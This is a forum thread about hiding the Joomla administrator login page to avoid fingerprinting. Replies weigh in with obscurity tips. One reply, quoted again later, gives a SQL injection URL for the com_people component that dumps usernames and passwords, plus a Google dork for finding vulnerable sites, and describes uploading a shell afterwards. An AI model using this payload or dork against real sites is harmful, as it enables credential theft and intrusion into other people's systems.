Hi joomla gurus.

have u idea how i can remove the joomla admnistrator log in page from the public view.
i.e www.sitename.com/administrator
this is one way of knowing any site deliverd with joomla and u might not want to reveal that.
so what do u ?


thanks

1) How many regular users will know to type "/administrator"?
2) Who cares that you are using Joomla? Is it a sin?

Someone like me can tell if you are using Joomla 99% of the time simply by looking at the layout of the page and/or your urls.

@yawa thnks
but what do u suggest?

yawa-ti-de:

1) How many regular users will know to type "/administrator"?
2) Who cares that you are using Joomla? Is it a sin?

1.) Whats yo definition of 'regular'? Dyu know malicious users also fall into this category 2?
2.) Kiddies, haXors, 3l33t, Random Scripts Users, Real-life Enemies, Virtual Enemies.

Lemme cite an example,

One of the aforementioned 'regular users' visits www . exploit-db . com , searches for any "Joomla" exploit and comes across the "People Component" exploit in Joomla. .i.e. www . exploit-db . com /exploits/15989/ .

The exploit says

A) SQL Injection
 
http://site/path/index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT username,password,3 FROM jos_users

That means a simple google query i.e.

inurl:/index.php?option=com_people&controller=people

will bring out ALL sites using this component. Adding

-1 UNION SELECT username,password,3 FROM jos_users

after the 'id' parameter will reveal usernames & pwds.

And what makes the whole 'exploitation' interesting? Finding a 'login page'! Nd for joomla, its /administrator. . .Before yhu know whats happening, u ve an intruder in yo system. .he might up a svr shell, up a Mailer, get yo customer's infos and so on. .

Buh an admin usrname & pwd WITHOUT a login page is as useless as having a KEY without a door to open with.


@OP, twill be nice if you can find yo way round it OR better still try asking

http://www.lekeojikutu.com/

(use the contact me form). .he's also a member here and he configd his well. [size=4pt]at least to some extent.[/size]

Jst got released frm NL's Jail. .Chk d image attached

Leave it there.

schneid:

Hi joomla gurus.

have u idea how i can remove the joomla admnistrator log in page from the public view.
i.e www.sitename.com/administrator
this is one way of knowing any site deliverd with joomla and u might not want to reveal that.
so what do u ?


thanks

I suggest u should install your joomla in a directory named "i or 1", or any hard to notice character. With this, your admin will only load on: www.sitename.com/i/administrator (Note the: /i/). Many regular users will never type "/i/administrator"
Do not forget to redirect www.sitename.com to www.sitename.com/i if not your site will not be found by searching www.sitename.com

Enjoy!

Oga slyrox,

I understand where you are coming from, don't get me wrong. All websites on the net are pretty much vulnerable, when it boils down to it. Having said that, it is up to the web developer/web host to add as many layers of security on top of what may already be there so as to avoid as many loopholes as possible.

I tried your script on 3 joomla sites that I know and it didn't produce the results as posted here. Not to say that it won't work on any other site(s), it didn't work on the ones I tested out.

yawa-ti-de:

Leave it there.

okay i will try that.
it seems lojik offered a solution a long time ago but i did not take note. does anyone has link to that thread?
oga lojik come rescue this ,

Hopefully, it is one of these,

http://search.yahoo.com/search?p=lojik+joomla&fr=yscpb&vs=nairaland.com

@yawa tanks, i was able to get this:

[/quote]Re: What Cool Joomla Site(s) Have You Seen?
« #25 on: September 01, 2009, 11:25 AM »

Quote from: badesemowo on September 01, 2009, 08:36 AM
@infinity . Did you know you can actually move the administrator folder, remove the tp=1 from showing module position, in Joomla, not that I think the doctors would have the resources (and business case) to do that but that its possible.
More high profile guys (internationally) are using open source systems instead of investing in new codes. They invest in removing the common fingerprints of the codes.

@badesemowo thanks i only knew of the tp=1 hack but not the admin folder! Coming to think of it that's really a lot of work considering there are a large number of components and modules that when installed depend on files in the administrator folder. One will have to go through lots of files especially for a large site changing the file path in the scripts. When it comes to updating components and modules instead of the few clicks upgrade u still have to go through the "painful process" again! Cheesy
Report to moderator Logged
website designers in mombasa
badesemowo (m)
Arrogantly Nigerian
Posts: 78

Offline Offline


Re: What Cool Joomla Site(s) Have You Seen?
« #26 on: September 01, 2009, 12:27 PM »

Well its actually not that hard.
Joomla defines the component folder and administrative folder by a global variable:
JPATH_COMPONENT , JPATH_ADMINISTRATOR
so you just have to change it in one place.

except ofcourse kid developers that point to the administrative path absolutely.

and most upgrades can be done by just overwritting the adminstrative directory, where ever it is.

the only thing is why bother if you are not working for a bank, or government.

@yawatide , thank you.[quote]

sincerely, i dnt get all this.
anyway WHY BOTHER!!!!!!!!!!

thanks yawa

Oga Yawa, dat exploit aint 0-day anymore reason y it ddnt work on d sited u tested 'em on. . .go thru d exploit db site nd u'll understand me.

Slyr0x:


1.) Whats yo definition of 'regular'? Dyu know malicious users also fall into this category 2?
2.) Kiddies, haXors, 3l33t, Random Scripts Users, Real-life Enemies, Virtual Enemies.

Lemme cite an example,

One of the aforementioned 'regular users' visits www . exploit-db . com , searches for any "Joomla" exploit and comes across the "People Component" exploit in Joomla. .i.e. www . exploit-db . com /exploits/15989/ .

The exploit says

A) SQL Injection
 
http://site/path/index.php?option=com_people&controller=people&task=details&id=-1 UNION SELECT username,password,3 FROM jos_users

That means a simple google query i.e.

inurl:/index.php?option=com_people&controller=people

will bring out ALL sites using this component. Adding

-1 UNION SELECT username,password,3 FROM jos_users

after the 'id' parameter will reveal usernames & pwds.

And what makes the whole 'exploitation' interesting? Finding a 'login page'! Nd for joomla, its /administrator. . .Before yhu know whats happening, u ve an intruder in yo system. .he might up a svr shell, up a Mailer, get yo customer's infos and so on. .

Buh an admin usrname & pwd WITHOUT a login page is as useless as having a KEY without a door to open with.


@OP, twill be nice if you can find yo way round it OR better still try asking

http://www.lekeojikutu.com/

(use the contact me form). .he's also a member here and he configd his well. [size=4pt]at least to some extent.[/size]

Mr.slyr0x good day bruv . Please it's very important I speak with you, how do I contact you please